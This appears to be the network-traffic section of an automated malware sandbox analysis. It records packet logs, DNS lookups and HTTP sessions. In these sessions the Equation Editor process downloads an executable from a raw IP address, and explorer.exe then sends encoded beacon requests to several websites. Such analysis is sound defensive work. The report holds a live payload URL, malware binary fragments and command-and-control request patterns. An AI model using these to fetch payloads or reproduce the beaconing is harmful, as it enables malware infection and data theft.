                                                                                                                                                        Jan 13, 2021 17:20:49.837861061 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.837872028 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.837883949 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.837897062 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.837908030 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.837918997 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.838015079 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878751993 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878777027 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878793955 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878808975 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878815889 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878819942 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878832102 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878838062 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878839970 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878853083 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878854036 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878869057 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878870010 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878885031 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878885031 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878897905 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878901005 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878920078 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878921032 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878935099 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878936052 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.878946066 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.878972054 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.881207943 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920119047 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920152903 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920171022 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920175076 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920187950 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920192003 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920206070 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920209885 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920226097 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920227051 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920237064 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920247078 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920263052 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920267105 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920279980 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920291901 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920298100 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920320034 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920329094 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920339108 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920352936 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920356035 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920368910 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920381069 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920387983 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920403957 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920412064 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920422077 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920432091 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920439959 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920448065 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920461893 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920464039 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920485020 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920494080 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920504093 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920511961 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920521975 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920526981 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920538902 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920547009 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920556068 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.920563936 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920583010 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.920607090 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.922650099 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.961369991 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.961519957 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.961555958 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.961606026 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.961808920 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.961841106 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.961868048 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.961868048 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.961882114 CET4916780192.168.2.2218.195.87.136
                                                                                                                                                        Jan 13, 2021 17:20:49.961893082 CET804916718.195.87.136192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:20:49.961910009 CET804916718.195.87.136192.168.2.22

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 13, 2021 17:21:58.579544067 CET5219753192.168.2.228.8.8.8
                                                                                                                                                        Jan 13, 2021 17:21:58.645411968 CET53521978.8.8.8192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:22:04.002742052 CET5309953192.168.2.228.8.8.8
                                                                                                                                                        Jan 13, 2021 17:22:04.200355053 CET53530998.8.8.8192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:22:09.216767073 CET5283853192.168.2.228.8.8.8
                                                                                                                                                        Jan 13, 2021 17:22:09.346319914 CET53528388.8.8.8192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:22:14.372931957 CET6120053192.168.2.228.8.8.8
                                                                                                                                                        Jan 13, 2021 17:22:14.456639051 CET53612008.8.8.8192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:22:24.648885965 CET4954853192.168.2.228.8.8.8
                                                                                                                                                        Jan 13, 2021 17:22:24.733634949 CET53495488.8.8.8192.168.2.22
                                                                                                                                                        Jan 13, 2021 17:22:29.937338114 CET5562753192.168.2.228.8.8.8
                                                                                                                                                        Jan 13, 2021 17:22:30.010046959 CET53556278.8.8.8192.168.2.22

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                        Jan 13, 2021 17:21:58.579544067 CET192.168.2.228.8.8.80x2e78Standard query (0)www.usmedicarenow.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:04.002742052 CET192.168.2.228.8.8.80x2f03Standard query (0)www.openspiers.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:09.216767073 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.yjpps.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:14.372931957 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.curateherstories.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:24.648885965 CET192.168.2.228.8.8.80xf09aStandard query (0)www.kolamart.comA (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:29.937338114 CET192.168.2.228.8.8.80x18f7Standard query (0)www.magnabeautystyle.comA (IP address)IN (0x0001)

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                        Jan 13, 2021 17:21:58.645411968 CET8.8.8.8192.168.2.220x2e78No error (0)www.usmedicarenow.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:21:58.645411968 CET8.8.8.8192.168.2.220x2e78No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:21:58.645411968 CET8.8.8.8192.168.2.220x2e78No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:21:58.645411968 CET8.8.8.8192.168.2.220x2e78No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:21:58.645411968 CET8.8.8.8192.168.2.220x2e78No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:04.200355053 CET8.8.8.8192.168.2.220x2f03Server failure (2)www.openspiers.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:09.346319914 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.yjpps.com0.0.0.0A (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:14.456639051 CET8.8.8.8192.168.2.220x6ec7No error (0)www.curateherstories.comcurateherstories.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:14.456639051 CET8.8.8.8192.168.2.220x6ec7No error (0)curateherstories.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:24.733634949 CET8.8.8.8192.168.2.220xf09aNo error (0)www.kolamart.comkolamart.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:24.733634949 CET8.8.8.8192.168.2.220xf09aNo error (0)kolamart.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:30.010046959 CET8.8.8.8192.168.2.220x18f7No error (0)www.magnabeautystyle.commagnabeautystyle.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        Jan 13, 2021 17:22:30.010046959 CET8.8.8.8192.168.2.220x18f7No error (0)magnabeautystyle.com184.168.131.241A (IP address)IN (0x0001)

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • 18.195.87.136
                                                                                                                                                        • www.usmedicarenow.com
                                                                                                                                                        • www.curateherstories.com
                                                                                                                                                        • www.kolamart.com
                                                                                                                                                        • www.magnabeautystyle.com

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.224916718.195.87.13680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2021 17:20:49.755462885 CET0OUTGET /ttkkz/file1.exe HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                        Host: 18.195.87.136
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 13, 2021 17:20:49.797003984 CET1INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 13 Jan 2021 16:20:46 GMT
                                                                                                                                                        Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                        Last-Modified: Wed, 13 Jan 2021 09:32:27 GMT
                                                                                                                                                        ETag: "f5e00-5b8c4d146c266"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Length: 1007104
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bc bd fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 54 0f 00 00 08 00 00 00 00 00 00 1e 73 0f 00 00 20 00 00 00 80 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 72 0f 00 4b 00 00 00 00 80 0f 00 f0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 53 0f 00 00 20 00 00 00 54 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 05 00 00 00 80 0f 00 00 06 00 00 00 56 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0f 00 00 02 00 00 00 5c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 d1 0c 00 f8 a0 02 00 03 00 00 00 85 02 00 06 08 e9 03 00 d0 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b2 2f ee 7c 11 a1 96 e6 10 8f ef f8 ed 01 ee 28 c0 c6 16 57 a0 2e 9b 1e 28 96 a4 cd c5 44 67 2b 0a e9 16 dc ec ae 1c da 83 35 18 f5 c6 af 07 54 39 45 16 2f 64 cd 4d e8 bf a9 31 51 ae 81 aa 81 21 a1 2b b9 5d 17 01 47 1a d5 32 5c be 61 22 d7 63 30 30 34 df 44 92 6c e3 dd 36 a1 5d 8a 1d 5c 18 b6 6e aa c0 14 7c fe ab b6 5c 5a 34 05 06 2d 1d 33 5f 09 29 f6 08 22 12 b0 6c d6 23 ee 67 c8 3d e0 d0 5c 52 f1 dc 44 2d 08 d5 a8 99 34 fd de a6 fa 82 50 1f c2 3f 28 f4 76 68 c3 88 2e a6 d6 73 16 be e2 be f8 67 83 c7 7c 3d 11 86 af ca 46 5a 6c 58 26 04 d6 b1 9c 8e d4 12 a5 e6 5b f2 40 64 45 2a f7 70 64 c0 25 66 7d 49 9b cb 81 f4 b5 b8 14 8b 77 3c 38 70 8a 15 fe 20 33 bd 40 6d 1d d8 bc 44 6e 50 9b fd 04 f7 29 2e 25 43 10 ee 4e 3f 88 00 63 cc ee c4 f8 40 f3 65 3b 9e 1c da 34 68 62 d3 aa a1 d5 76 ce 3e ec a0 bd c7 8d d6 37 2e d4 06 f2 79 13 ad a9 c9 24 53 40 2f 29 e2 0f 08 93 8d 40 c6 d5 a5 1d 7c a9 35 ad 6c 55 2e 6f a2 70 52 c8 4e ff d4 7d 51 98 d1 1a fe fe be 70 d0 ea 45 de 0f d8 35 cc c0 d8 f3 d6 ab 59 aa 94 3c 8a 3b 53 29 58 f4 91 70 3b f8 3c c9 4a 52 bb 8b 53 be 93 92 dd 22 86 6b 11 1d 4e 3f b7 c8 d8 67 87 00 36 60 83 ab c3 64 ad 7b df 90 21 ef e6 2d 46 f4 aa 1f 19 14 9e 9a bf 09 63 79 65 50 c0 d5 a0 6a 3e 1b 35 53 5c 46 a3 6c 2b 86 90 ef e5
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_PTs @ @rK H.text$S T `.rsrcV@@.reloc\@BsH/|(W.(Dg+5T9E/dM1Q!+]G2\a"c004Dl6]\n|\Z4-3_)"l#g=\RD-4P?(vh.sg|=FZlX&[@dE*pd%f}Iw<8p 3@mDnP).%CN?c@e;4hbv>7.y$S@/)@|5lU.opRN}QpE5Y<;S)Xp;<JRS"kN?g6`d{!-FcyePj>5S\Fl+


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        1192.168.2.2249168198.185.159.14580C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2021 17:21:58.826993942 CET1065OUTGET /bw82/?Ab=gXuD_lh8bfV4RN&x2J8=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ== HTTP/1.1
                                                                                                                                                        Host: www.usmedicarenow.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 13, 2021 17:21:58.999695063 CET1066INHTTP/1.1 400 Bad Request
                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                        Content-Length: 77564
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Date: Wed, 13 Jan 2021 16:21:58 UTC
                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Server: Squarespace
                                                                                                                                                        X-Contextid: b1RjMO1x/pZARiXmV
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                                                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        2192.168.2.224916934.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2021 17:22:14.497790098 CET1092OUTGET /bw82/?x2J8=2vyuGwHlN7ZUWGXZJyrkWp+hlAiWIN0rCXJnc3deUzDL3Fz4XyzD024y+ZTONjn0V5JpIg==&Ab=gXuD_lh8bfV4RN HTTP/1.1
                                                                                                                                                        Host: www.curateherstories.com
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Jan 13, 2021 17:22:14.636516094 CET1092INHTTP/1.1 403 Forbidden
                                                                                                                                                        Server: openresty
                                                                                                                                                        Date: Wed, 13 Jan 2021 16:22:14 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 275
                                                                                                                                                        ETag: "5ffc838f-113"
                                                                                                                                                        Via: 1.1 google
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        3192.168.2.224917034.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
